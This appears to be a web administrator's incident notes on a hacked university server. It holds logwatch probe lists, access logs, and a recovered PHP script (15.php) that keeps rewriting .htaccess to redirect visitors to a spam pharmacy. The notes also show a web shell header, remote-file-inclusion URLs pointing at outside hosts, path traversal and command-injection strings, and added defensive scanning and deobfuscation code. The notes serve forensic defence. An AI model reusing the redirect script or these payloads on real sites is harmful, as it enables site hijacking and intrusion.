/~cdhall/courses/exams/LagrangianPrime.bbl: 1 Time(s)
/~cdhall/courses/exams/LagrangianPrime.blg: 1 Time(s)
/~cdhall/courses/exams/LagrangianPrime.log: 1 Time(s)
/~cdhall/index_files/themedata.thmx: 1 Time(s)
404 Not Found
/%7Ejing/java/nsfapplets/css/css/backGifs/bk1.gif: 7 Time(s)
//admin.php?submit=submit&form_include_tem ... ars/simple.jpg?: 2 Time(s)
//ee_commerce/paypalcart.php?toroot=http:/ ... pyright.txt????: 1 Time(s)
//include/admin.lib.inc.php?site_path=http ... igen/.../ids???: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=4518 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6211 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 4 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 5 Time(s)
/_vti_bin/_vti_aut/author.dll: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=4518 ... MVER=4&CAPREQ=0: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6211 ... MVER=4&CAPREQ=0: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 4 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 5 Time(s)
/_vti_bin/shtml.exe/_vti_rpc: 7 Time(s)
/_vti_inf.html: 7 Time(s)
/alumni/alumnilist.php?class=1969: 1 Time(s)
/alumni/alumnilist.php?class=1971: 1 Time(s)
/alumni/alumnilist.php?class=1974: 1 Time(s)
/alumni/alumnilist.php?class=1976: 1 Time(s)
/alumni/alumnilist.php?class=1985: 1 Time(s)
/alumni/alumnilist.php?class=1986: 2 Time(s)
/alumni/alumnilist.php?class=1995: 1 Time(s)
/alumni/alumnilist.php?class=1997: 1 Time(s)
/alumni/alumnilist.php?class=2000: 1 Time(s)
/alumni/alumnilist.php?class=2001: 2 Time(s)
/alumni/alumnilist.php?class=2003: 1 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment1%2C+: 10 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment2%2C+: 22 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment3%2C+: 13 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment4%2C+: 20 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment5%2C+: 11 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment6%2C+: 12 Time(s)
/cgi-bin/mt/mt-comments.cgi: 2 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1329: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=216: 1 Time(s)
/cgi-bin/mt/mt-search.cgi?IncludeBlogs=2&search=powerpoint: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1329: 3 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s)
/design/hpa/spgm/index.php?spgmGal=Flight_ ... 22&spgmFilters=: 1 Time(s)
/design/hpa/spgm/index.php?spgmGal=Flight_ ... 29&spgmFilters=: 1 Time(s)
/design/hpa/spgm/index.php?spgmGal=Flight_ ... 40&spgmFilters=: 1 Time(s)
/design/hpa/spgm/index.php?spgmGal=Flight_ ... =0&spgmFilters=: 1 Time(s)
/design/hpa/spgm/index.php?spgmGal=Flight_ ... =6&spgmFilters=: 1 Time(s)
/errors.php?error=http://home.covenantberk ... s/kampret.jpg??: 2 Time(s)
/giving//?_SERVER[DOCUMENT_ROOT]=http://ww ... /bajocdm2.txt??: 1 Time(s)
/giving//?_SERVER[DOCUMENT_ROOT]=http://ww ... /upload/ec.txt?: 6 Time(s)
/giving//?_SERVER[DOCUMENT_ROOT]=http://ww ... com/allnet.txt?: 1 Time(s)
/giving//?_SERVER[DOCUMENT_ROOT]=http://ww ... ote_log/ec.txt?: 3 Time(s)
/organizations//index.php?go=http://www.to ... ips_w/id.txt???: 1 Time(s)
/organizations/aiaa//index.php?go=http://w ... ips_w/id.txt???: 1 Time(s)
/organizations/aiaa/errors.php?error=http: ... s/kampret.jpg??: 1 Time(s)
/organizations/aiaa/index.php?go=l%20...// ... ips_w/id.txt???: 1 Time(s)
/organizations/aiaa/index.php?go=links: 1 Time(s)
/organizations/aiaa/index.php?go=whatwedo: 2 Time(s)
/organizations/aiaa/lutze/health/best-viagra.html: 1 Time(s)
/organizations/aiaa/lutze/health/buy-cheapest-cialis.html: 1 Time(s)
/organizations/aiaa/lutze/health/buy-ciali ... ofessional.html: 1 Time(s)
/organizations/aiaa/lutze/health/buy-viagra-pills.html: 1 Time(s)
/organizations/aiaa/lutze/health/buying-re ... escription.html: 1 Time(s)
/organizations/aiaa/lutze/health/canadian- ... acy-cialis.html: 1 Time(s)
/organizations/aiaa/lutze/health/canadian- ... agra-legal.html: 1 Time(s)
/organizations/aiaa/lutze/health/cialis-en-mexico.html: 1 Time(s)
/organizations/aiaa/lutze/health/cialis-ne ... y-delivery.html: 1 Time(s)
/organizations/aiaa/lutze/health/cialis-on ... escription.html: 1 Time(s)
/organizations/aiaa/lutze/health/cialis-professional.html: 1 Time(s)
/organizations/aiaa/lutze/health/cialis-strenght-mg.html: 1 Time(s)
/organizations/aiaa/lutze/health/cialis-transdermal.html: 1 Time(s)
/organizations/aiaa/lutze/health/how-to-bu ... -in-canada.html: 1 Time(s)
/organizations/aiaa/lutze/health/purchase- ... y-delivery.html: 1 Time(s)
/organizations/aiaa/lutze/health/purchase-cialis.html: 1 Time(s)
/organizations/aiaa/lutze/health/purchasin ... y-delivery.html: 1 Time(s)
/organizations/aiaa/lutze/health/viagra-brand.html: 1 Time(s)
/organizations/aiaa/lutze/health/viagra-canada-generic.html: 1 Time(s)
/organizations/aiaa/lutze/health/viagra-dosage.html: 1 Time(s)
/organizations/aiaa/lutze/health/viagra-in-spain.html: 1 Time(s)
/organizations/aiaa/lutze/health/viagra-online-deals.html: 1 Time(s)
/organizations/aiaa/lutze/health/viagra-pr ... tion-label.html: 1 Time(s)
/organizations/aiaa/lutze/health/viagra-sales-canada.html: 1 Time(s)
/organizations/aiaa/lutze/health/when-will ... be-generic.html: 1 Time(s)
/organizations/aiaa/lutze/health/where-to- ... agra-cheap.html: 1 Time(s)
/organizations/aiaa/lutze/health/where-to-buy-cialis.html: 1 Time(s)
/organizations/errors.php?error=http://hom ... s/kampret.jpg??: 1 Time(s)
/organizations/vtsgt/gallery/add_comment.p ... lery_popup=true: 3 Time(s)
/research/?area_id=2: 1 Time(s)
/research/?area_id=3: 4 Time(s)
/research/?area_id=6: 1 Time(s)
/research/thesis: 3 Time(s)
/research/thesis/?mode=area_selected&thesis_area=1: 1 Time(s)
/research/thesis/?mode=area_selected&thesis_area=2: 2 Time(s)
/research/thesis/index.php: 1 Time(s)
/research/thesis?PHPSESSID=6d7a4053baa4341ecb12f59c3e96713e: 1 Time(s)
/research/thesis?PHPSESSID=84e12d3ca0c34b1db03f42dede788a6a: 1 Time(s)
/~amir/: 1 Time(s)
/~balabanv/Meetings/hpccp.wksh.97.ps: 1 Time(s)
/~brown/Papers//source/mod/rss/view.php?Co ... ./../etc/passwd: 1 Time(s)
/~brown/Papers/source/mod/rss/view.php?Cod ... w.rabika.ru/hk?: 1 Time(s)
/~brown/VTShipDesign/VTDesignforAffordabil ... es/editdata.mso: 1 Time(s)
/~brown/VTShipDesign/VTShipDesign_files/editdata.mso: 2 Time(s)
/~brown/VTShipDesign/errors.php?error=http ... s/kampret.jpg??: 1 Time(s)
/~brown/errors.php?error=http://home.coven ... s/kampret.jpg??: 1 Time(s)
/~cdhall/MyMaps/Usage%20&%20FAQ.txt//?file ... ips_w/id.txt???: 1 Time(s)
/~cliff/aoe5244/aoe5244.html: 1 Time(s)
/~cliff/aoe5244/proj_lagr.pdf: 1 Time(s)
/~cliff/aoe5244/quad_eg.m: 1 Time(s)
/~cwoolsey//ee_commerce/paypalcart.php?tor ... pyright.txt????: 1 Time(s)
/~cwoolsey/Advisees//ee_commerce/paypalcar ... pyright.txt????: 1 Time(s)
/~cwoolsey/Advisees/Undergraduate//ee_comm ... pyright.txt????: 1 Time(s)
/~cwoolsey/Advisees/Undergraduate/FaruqueA ... pyright.txt????: 2 Time(s)
/~cwoolsey/Courses/AOE3134/(null): 1 Time(s)
/~devenpor/aoe3054/(null): 1 Time(s)
/~grasmeye/bkmk.html: 1 Time(s)
/~grasmeye/photos/allison/: 1 Time(s)
/~grasmeye/photos/allison/billstory.html: 1 Time(s)
/~grasmeye/photos/hotsprings: 1 Time(s)
/~grasmeye/photos/hotsprings/: 1 Time(s)
/~grasmeye/photos/index.html: 2 Time(s)
/~grasmeye/photos/mexico/: 1 Time(s)
/~hokiesat/subs/wiring//include/admin.lib. ... igen/.../ids???: 1 Time(s)
/~hokiesat/subs/wiring/New%20Stuff//includ ... igen/.../ids???: 1 Time(s)
/~jing/MohrCircle.html&ei=o40KSpeLG4mqtgeC ... SwUj1hKfdf6I2cQ: 1 Time(s)
/~jkuhn/: 3 Time(s)
/~jkuhn/office2003.tar/: 1 Time(s)
/~lutze/AOE4134/7MissionAnalysis.pdf/?_SER ... /upload/ec.txt?: 1 Time(s)
/~lutze/AOE4134/patchedconiceqs.pdf/?_SERV ... /bajocdm2.txt??: 1 Time(s)
/~lutze/AOE4134/patchedconiceqs.pdf/?_SERV ... /upload/ec.txt?: 6 Time(s)
/~lutze/AOE4134/patchedconiceqs.pdf/?_SERV ... ote_log/ec.txt?: 2 Time(s)
/~mason/Mason_f//source/mod/rss/view.php?C ... ./../etc/passwd: 1 Time(s)
/~mason/Mason_f/source/mod/rss/view.php?Co ... w.rabika.ru/hk?: 1 Time(s)
/~mason/Mason_f/www.avweb.com/news/reviews/182564-1.html: 1 Time(s)
/~simpson/PDFMedia029559/e/0: 1 Time(s)
/~simpson/PDFMedia029559/e/1: 1 Time(s)
/~simpson/aoe4154/(null): 1 Time(s)
/~specs-a: 1 Time(s)
/~teamga/: 1 Time(s)
/~tether-a: 1 Time(s)
/~walters/AOE6145: 1 Time(s)
/~wang/: 1 Time(s)
/~wang/heat: 3 Time(s)
/~wang/robots.txt: 1 Time(s)
405 Method Not Allowed
/~hokiesat/: 1 Time(s)
/~mason/: 12 Time(s)
416 Request Range Not Satisfiable
/~mason/Mason_f/DBF/hpa_compilation.wmv: 1 Time(s)
/~mason/Mason_f/VTechT1Gavial.pdf: 2 Time(s)
Today this was found in research:
[root@bacchus research]# ls -Fla
total 132
drwxrwsr-x 7 apache web-admin 4096 May 4 09:39 ./
drwxrwsr-x 26 apache web-admin 4096 Apr 15 13:21 ../
-rw-r--r-- 1 apache web-admin 378 May 4 09:39 15.php
[root@bacchus research]# cat 15.php
<?
//Error_Reporting(E_ALL & ~E_NOTICE);
$text='redirect / http://top-pharm-shop.com/group.php?group_id=152&said=sssl';
ignore_user_abort(true);
set_time_limit(0);
while(!is_file('ntfs'))
{
$fp = @fopen("/www/sssl-html/simplePHPblog/healthcenter/.htaccess","w");
@flock ($fp, LOCK_EX);
@fputs($fp,$text);
@flock ($fp, LOCK_UN);
@fclose($fp);
sleep(0);
}
?>
No .htaccess file was in healthcenter (the loop in 15.php keeps rewriting it until a file named ntfs appears next to the script).
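A check for what 15.php was doing, as an added example that is not part of the notebook: scan every .htaccess under a web root for Redirect/RewriteRule targets on a foreign host. The web root, the own-host list (OWN_HOSTS) and the sample .htaccess contents are assumptions constructed here.

```python
# Added example, not the notebook's own tooling: find .htaccess files whose
# Redirect or RewriteRule target points at a foreign host, i.e. the hijack
# that 15.php kept writing into healthcenter/.htaccess.
import os
import shlex
import tempfile
from urllib.parse import urlsplit

# Apache directives whose last argument is the redirect target
REDIRECT_DIRECTIVES = {"redirect", "redirectmatch", "redirectpermanent", "redirecttemp"}

# Hosts that are allowed as redirect targets (assumed for this example)
OWN_HOSTS = {"www.aoe.vt.edu", "aoe.vt.edu"}


def offsite_redirects(htaccess_text, own_hosts):
    """Return (lineno, directive, target) for every directive that sends visitors
    to a host outside own_hosts. Relative targets and same-host URLs are ignored."""
    hits = []
    for lineno, raw in enumerate(htaccess_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            parts = shlex.split(line)
        except ValueError:              # unbalanced quotes: fall back to plain split
            parts = line.split()
        if not parts:
            continue
        directive = parts[0].lower()
        target = None
        if directive in REDIRECT_DIRECTIVES and len(parts) >= 2:
            target = parts[-1]          # Redirect [status] path URL
        elif directive == "rewriterule" and len(parts) >= 3:
            target = parts[2]           # RewriteRule pattern substitution [flags]
        if target is None:
            continue
        url = urlsplit(target)
        host = (url.hostname or "").lower()
        if url.scheme in ("http", "https") and host and host not in own_hosts:
            hits.append((lineno, parts[0], target))
    return hits


def scan_webroot(root, own_hosts):
    """Walk root; map each .htaccess path to its off-site redirect hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, errors="replace") as fh:
                hits = offsite_redirects(fh.read(), own_hosts)
            if hits:
                findings[path] = hits
    return findings


# Constructed samples: the first is the text 15.php wrote, the second is benign
SAMPLE_HIJACKED = "redirect / http://top-pharm-shop.com/group.php?group_id=152&said=sssl\n"
SAMPLE_CLEAN = (
    "# legitimate rules\n"
    "Redirect permanent /oldpage.html /newpage.html\n"
    "RewriteEngine On\n"
    "RewriteRule ^blog/(.*)$ http://www.aoe.vt.edu/blog/$1 [R=301,L]\n"
)


def demo_scan():
    """Build a throwaway web root with one clean and one hijacked .htaccess, scan it,
    and return findings keyed by path relative to the root."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "healthcenter"))
        with open(os.path.join(root, ".htaccess"), "w") as fh:
            fh.write(SAMPLE_CLEAN)
        with open(os.path.join(root, "healthcenter", ".htaccess"), "w") as fh:
            fh.write(SAMPLE_HIJACKED)
        findings = scan_webroot(root, OWN_HOSTS)
        return {os.path.relpath(p, root): hits for p, hits in findings.items()}


if __name__ == "__main__":
    for path, hits in demo_scan().items():
        for lineno, directive, target in hits:
            print(f"{path}:{lineno}: {directive} -> {target}")
```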
195.151.216.49 - admin [04/May/2009:09:35:57 -0400] "POST /prospective/sitemap.php HTTP/1.0" 200 55416
131.107.155.228 - - [04/May/2009:09:36:00 -0400] "GET /~cdhall/Space/ HTTP/1.1" 200 72971
195.151.216.49 - admin [04/May/2009:09:36:00 -0400] "POST /prospective/sitemap.php HTTP/1.0" 200 41075
195.151.216.49 - admin [04/May/2009:09:36:08 -0400] "POST /prospective/sitemap.php HTTP/1.0" 200 16614
61.135.216.104 - - [04/May/2009:09:36:11 -0400] "GET /~cdhall/Space/index.rdf HTTP/1.1" 200 10220
198.82.16.13 - - [04/May/2009:09:36:13 -0400] "GET /~aborgolt/aoe3054/classes/Class%204%20-%20Analog%20Instrumentation%20-%202009-02-09.pdf HTTP/1.1" 200 808664
198.82.16.13 - - [04/May/2009:09:36:13 -0400] "GET /~aborgolt/aoe3054/classes/Class%204%20-%20Analog%20Instrumentation%20-%202009-02-09.pdf HTTP/1.1" 206 748477
195.151.216.49 - admin [04/May/2009:09:36:14 -0400] "POST /prospective/sitemap.php HTTP/1.0" 200 17045
66.235.124.59 - - [04/May/2009:09:36:17 -0400] "GET /%7Ekapania/StructuresPrelim/ HTTP/1.0" 200 11835
195.151.216.49 - admin [04/May/2009:09:36:18 -0400] "GET /prospective/sitemap.php HTTP/1.0" 200 22649
204.111.158.56 - - [04/May/2009:09:36:37 -0400] "GET /~aborgolt/aoe3054/classes/Class%206%20-%20Dynamic%20Response%20-%202009-02-23.pdf HTTP/1.1" 200 667923
195.151.216.49 - - [04/May/2009:09:36:38 -0400] "GET /alumni/15.php HTTP/1.0" 200 384
[root@bacchus www]# find /mnt/lacie/bacchus-hacked/ -iname sitemap.php
/mnt/lacie/bacchus-hacked/www/aoe-html/prospective/sitemap.php
/mnt/lacie/bacchus-hacked/www/aoe-html/sitemap.php
/mnt/lacie/bacchus-hacked/www/sssl-html/simplePHPblogOld/sitemap.php
[root@bacchus aoe-html]# ls -Fla /mnt/lacie/bacchus-hacked/www/aoe-html/prospective/
total 244
drwxrwsr-x 2 apache web-admin 4096 May 4 09:52 ./
drwxrwsr-x 26 apache web-admin 4096 Apr 15 13:21 ../
-rw-r--r-- 1 apache web-admin 147623 May 4 09:52 1.zip
-rwxrwxr-x 1 mkapania web-admin 3059 Sep 1 2008 index.php*
-rwxrwxr-x 1 mkapania web-admin 3053 Aug 7 2008 index.php~*
-rw-r--r-- 1 lscharf web-admin 207 Jun 10 2005 sitemap.dat
-rw-r--r-- 1 apache web-admin 44293 Apr 26 16:48 sitemap.php
74.6.17.174 - - [26/Apr/2009:16:00:18 -0400] "GET /pics/weeki2008/Weeki%20Wachi/slides/DSC_0074.html HTTP/1.0" 200 10701
67.195.111.186 - - [26/Apr/2009:16:01:15 -0400] "GET /vids/thumbs/?p=no-1-online-viagra HTTP/1.0" 200 6244
67.195.111.186 - - [26/Apr/2009:16:01:58 -0400] "GET /vids/thumbs/?p=daily-cialis-online HTTP/1.0" 200 6764
74.6.17.174 - - [26/Apr/2009:16:10:45 -0400] "GET /pics/weeki2007/Weeki_Wachee/3_Welcome_to_Weeki_Wachee/slides/IMG_0383.html HTTP/1.0" 200 9329
74.6.17.174 - - [26/Apr/2009:16:11:08 -0400] "GET /pics/weeki2008/Weeki%20Wachi/slides/DSC_0024.html HTTP/1.0" 200 10703
173.5.177.60 - - [26/Apr/2009:16:14:44 -0400] "GET /vids/thumbs/?p=cialis-1-a-day HTTP/1.1" 200 6681
173.5.177.60 - - [26/Apr/2009:16:14:44 -0400] "GET /vids/thumbs/script.js HTTP/1.1" 404 -
173.5.177.60 - - [26/Apr/2009:16:14:44 -0400] "GET /favicon.ico HTTP/1.1" 404 -
74.6.17.174 - - [26/Apr/2009:16:15:36 -0400] "GET /pics/weeki2007/5_The_Event/slides/100_0266.html HTTP/1.0" 200 9116
74.6.17.174 - - [26/Apr/2009:16:15:36 -0400] "GET /pics/weeki2007/res/styles.css HTTP/1.0" 304 -
65.55.208.216 - - [26/Apr/2009:16:16:34 -0400] "GET /html/pics4.html HTTP/1.1" 200 3234
74.6.17.174 - - [26/Apr/2009:16:16:35 -0400] "GET /pics/weeki2007/8_Underwater_2/slides/FH000029.html HTTP/1.0" 200 8766
67.195.111.186 - - [26/Apr/2009:16:16:39 -0400] "GET /vids/thumbs/?p=cheap-soft-cialis HTTP/1.0" 200 6898
95.52.81.134 - - [26/Apr/2009:16:18:38 -0400] "GET /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 6688
74.6.17.174 - - [26/Apr/2009:16:19:17 -0400] "GET /np/2108.html HTTP/1.0" 304 -
95.52.81.134 - - [26/Apr/2009:16:19:23 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 5975
95.52.81.134 - - [26/Apr/2009:16:19:28 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 4203
95.52.81.134 - - [26/Apr/2009:16:19:30 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 6014
95.52.81.134 - - [26/Apr/2009:16:19:34 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 8628
95.52.81.134 - - [26/Apr/2009:16:19:37 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 3744
95.52.81.134 - - [26/Apr/2009:16:19:38 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 29237
95.52.81.134 - - [26/Apr/2009:16:19:52 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 3288
95.52.81.134 - - [26/Apr/2009:16:19:59 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 29237
...
<?PHP
$login = "admin";
$pass = "admin";
$md5_pass = "";
eval(gzinflate(base64_decode('[long base64 blob omitted] and on and on...
copied to sitemap.b64
cp -a sitemap.php sitemap.b64
remove all except the base64 data with
vim -b sitemap.b64
openssl enc -d -base64 -a -A -in sitemap.b64 -out sitemap.gz
??? now what???
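One answer to "now what": the following added Python (not the notebook's own tooling) peels eval(gzinflate(base64_decode('...'))) layers statically, without running any of the PHP. gzinflate() is raw DEFLATE with no gzip header, so the sitemap.gz from the openssl step will not gunzip; zlib with a negative window size decodes it. The sample shell below is constructed here, not the real sitemap.php payload.

```python
# Added example: unwrap nested eval(gzinflate(base64_decode('...'))) layers
# the way an analyst would, with no PHP interpreter involved.
import base64
import re
import zlib

# The wrapper PHP obfuscators emit; group 1 is the base64 blob
WRAPPER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)\s*\)",
    re.DOTALL,
)


def gzinflate(data):
    """PHP gzinflate(): raw DEFLATE stream, no zlib/gzip header (wbits = -15)."""
    return zlib.decompress(data, -15)


def unpack_layers(php_source, max_layers=20):
    """Return the successively decoded layers, outermost first, innermost last.
    Stops when no wrapper is left or max_layers is hit (guards runaway nesting)."""
    layers = [php_source]
    for _ in range(max_layers):
        m = WRAPPER.search(layers[-1])
        if not m:
            break
        blob = re.sub(r"\s+", "", m.group(1))
        try:
            decoded = gzinflate(base64.b64decode(blob)).decode("utf-8", errors="replace")
        except (ValueError, zlib.error) as exc:
            layers.append(f"<<decode failed: {exc}>>")
            break
        layers.append(decoded)
    return layers


def summarize(php_source):
    """Dangerous functions referenced in the innermost layer: what the shell can
    do, for the incident write-up."""
    inner = unpack_layers(php_source)[-1]
    risky = ["exec", "shell_exec", "system", "passthru", "popen", "eval", "fopen", "fputs", "mail"]
    return sorted(f for f in risky if re.search(r"\b" + f + r"\s*\(", inner))


def php_wrap(inner):
    """Produce the eval(gzinflate(base64_decode(...))) form seen in sitemap.php,
    used here only to build a constructed sample."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = comp.compress(inner.encode()) + comp.flush()
    return "<?PHP\neval(gzinflate(base64_decode('" + base64.b64encode(raw).decode() + "')));\n?>"


# Constructed sample: an ec.txt-style stub (runs "id", as the one in the logs did),
# wrapped two layers deep
INNER = '<?php\n$login = "admin";\n$pass = "admin";\necho shell_exec("id");\n?>'
SAMPLE_SHELL = php_wrap(php_wrap(INNER))


if __name__ == "__main__":
    for depth, layer in enumerate(unpack_layers(SAMPLE_SHELL)):
        print(f"--- layer {depth} ({len(layer)} bytes) ---")
        print(layer[:200])
    print("risky calls:", summarize(SAMPLE_SHELL))
```

Run it against the real file with unpack_layers(open("sitemap.php").read()) and read the last layer; if a layer decodes into yet another encoder (str_rot13, another base64), add that decoder to the loop rather than executing anything.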
[root@bacchus functions]# pwd
/mnt/lacie/bacchus-mar12009/www/aoe-html/calendars/phpical/functions
[root@bacchus functions]# ls -Fla
total 228
drwxrwsr-x 2 apache web-admin 4096 Jul 14 2003 ./
drwxrwsr-x 8 apache web-admin 4096 Jul 14 2003 ../
-rw-r--r-- 1 root web-admin 1515 Jul 14 2003 date_add.php
-rw-r--r-- 1 root web-admin 5417 Jul 14 2003 date_functions.php
-rw-r--r-- 1 root web-admin 1640 Jul 14 2003 draw_functions.php
-rw-r--r-- 1 root web-admin 2652 Jul 14 2003 error.php
-rw-rw-r-- 1 apache web-admin 451 Oct 2 2002 event.js
-rw-r--r-- 1 root web-admin 27467 Jul 14 2003 ical_parser.php
-rw-r--r-- 1 root web-admin 3554 Jul 14 2003 init.inc.php
-rw-r--r-- 1 root web-admin 1954 Jul 14 2003 list_icals.php
-rw-r--r-- 1 apache web-admin 44333 Jul 14 2003 list_inc.php
-rw-r--r-- 1 root web-admin 817 Jul 14 2003 list_months.php
-rw-r--r-- 1 root web-admin 1248 Jul 14 2003 list_weeks.php
-rw-r--r-- 1 root web-admin 1129 Jul 14 2003 list_years.php
-rw-r--r-- 1 root web-admin 9903 Jul 14 2003 overlapping_events.php
-rw-r--r-- 1 root web-admin 26810 Jul 14 2003 timezones.php
www2 was created around this date
drwxr-xr-x 2 root root 4096 Oct 17 2008 www/
and event.js and list_inc.php files exist. They were likely deleted on this date:
drwxrwsr-x 2 apache web-admin 4096 Apr 26 16:30 functions/
May 14, 2009 Log Analysis
May 14th Log Analysis (Bacchus)
===============================
//?page=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200
A failed attempt to read the passwd file, just redirected to home page
/index.php?inc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP Response 200
Another failed attempt, just went to the home page
null HTTP Response 200
This is generated by IE 7 requesting an unavailable resource. Does no damage (and doesn't happen in Firefox)
//include/print_category.php?setup[use_cat ... ve.com/id.txt??: 2 Time(s)
Checking on this one right now, will come back to it later.
/alumni/alumnilist.php?class=http://193.12 ... 666/index.html?: 2 Time(s)
Need to add an input verification script on this file. It will guarantee this access fails.
/computing/faq/displayfaq.php?area_id=http ... 666/index.html?: 3 Time(s)
Coming from Amsterdam, probably need an input verifier on this page as well.
/hall.php?page=http://darkn3st.fileave.com/fx29id.txt?: 1 Time(s)
/hall.php?page=http://www.ladyboss.com.ua/fx29id2.txt???: 2 Time(s)
No file called hall.php, there is a randolph_hall.php but it looks secure, takes no parameters
/photo_comment.php?toroot=http://www.reeft ... a/index/bo.do??: 2 Time(s)
I can't find a file called photo_comment.php, but if it exists it should probably have an input verifier on it.
/~cdhall/courses/AUAE/styles_sniffer.js: 1 Time(s)
Can't find the file...not sure about this one.
http://88.80.7.248/pp/anp.php?a=UV%5CHWQBY ... U&b=1155&c=b870: 1 Time(s)
Traces to a site in Sweden called fast-medications.net...
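The sorting done by hand above, as an added example that is not part of the notebook: classify access-log requests into the probe families that recur in these logwatch reports (remote file inclusion, traversal/LFI, CGI command injection), count them logwatch-style, and flag the ones the server answered with 200, which is what the later "possible successful probes" entries mean. The log lines, IP addresses and attacker host are constructed.

```python
# Added example: triage of combined-format access log lines into the probe
# families seen in this notebook, flagging probes that got an HTTP 200.
import re
from collections import Counter
from urllib.parse import unquote

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Each family: name, pattern applied to the URL-decoded request target
PROBE_FAMILIES = [
    ("RFI", re.compile(r"[?&][^=&]+=https?://", re.I)),               # ?page=http://host/id.txt?
    ("LFI", re.compile(r"(\.\./){3,}|/proc/self/environ|/etc/passwd|\x00", re.I)),
    ("CMDI", re.compile(r"\|\s*(id|uname|pwd|cat|wget|curl)\b|passthru\(|;\s*id\b", re.I)),
]


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify(url):
    """Names of the probe families whose pattern matches the decoded request target."""
    decoded = unquote(url)
    return [name for name, rx in PROBE_FAMILIES if rx.search(decoded)]


def analyse(log_text):
    """Return (counts, successes): counts maps (family, url) -> hits, like logwatch's
    'N Time(s)'; successes lists (ip, family, url) for probes answered with 200."""
    counts = Counter()
    successes = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        for fam in classify(rec["url"]):
            counts[(fam, rec["url"])] += 1
            if rec["status"] == 200:
                successes.append((rec["ip"], fam, rec["url"]))
    return counts, successes


def report(counts):
    """Logwatch-style lines grouped by family, most frequent first."""
    lines = []
    for fam in ("RFI", "LFI", "CMDI"):
        items = sorted(((u, n) for (f, u), n in counts.items() if f == fam), key=lambda x: -x[1])
        if items:
            lines.append(f"{fam}:")
            lines.extend(f"  {u}: {n} Time(s)" for u, n in items)
    return lines


# Constructed sample log (RFC 5737 addresses, placeholder attacker host); the
# request shapes mirror the entries in the logwatch output above.
SAMPLE_LOG = "\n".join([
    '192.0.2.10 - - [14/May/2009:03:12:01 -0400] "GET //?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 5275',
    '192.0.2.10 - - [14/May/2009:03:12:02 -0400] "GET /index.php?inc=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5275',
    '198.51.100.7 - - [14/May/2009:04:40:13 -0400] "GET /alumni/alumnilist.php?class=http://attacker.example/id.txt? HTTP/1.1" 404 5275',
    '198.51.100.7 - - [14/May/2009:04:40:14 -0400] "GET /alumni/alumnilist.php?class=http://attacker.example/id.txt? HTTP/1.1" 404 5275',
    '203.0.113.5 - - [16/May/2009:10:02:55 -0400] "GET /cgi-bin/acart/acart.pl?&page=%7Cuname%20-a;pwd;id%7C HTTP/1.1" 404 5275',
    '203.0.113.5 - - [16/May/2009:10:02:56 -0400] "GET /services/help/?show=about&module=;%22.passthru(%22id%22); HTTP/1.1" 404 5275',
    '198.51.100.9 - - [16/May/2009:11:00:00 -0400] "GET /~cliff/aoe5244/aoe5244.html HTTP/1.1" 200 4481',
])


if __name__ == "__main__":
    counts, successes = analyse(SAMPLE_LOG)
    print("\n".join(report(counts)))
    for ip, fam, url in successes:
        print(f"POSSIBLE SUCCESS ({fam}) from {ip}: {url}")
```

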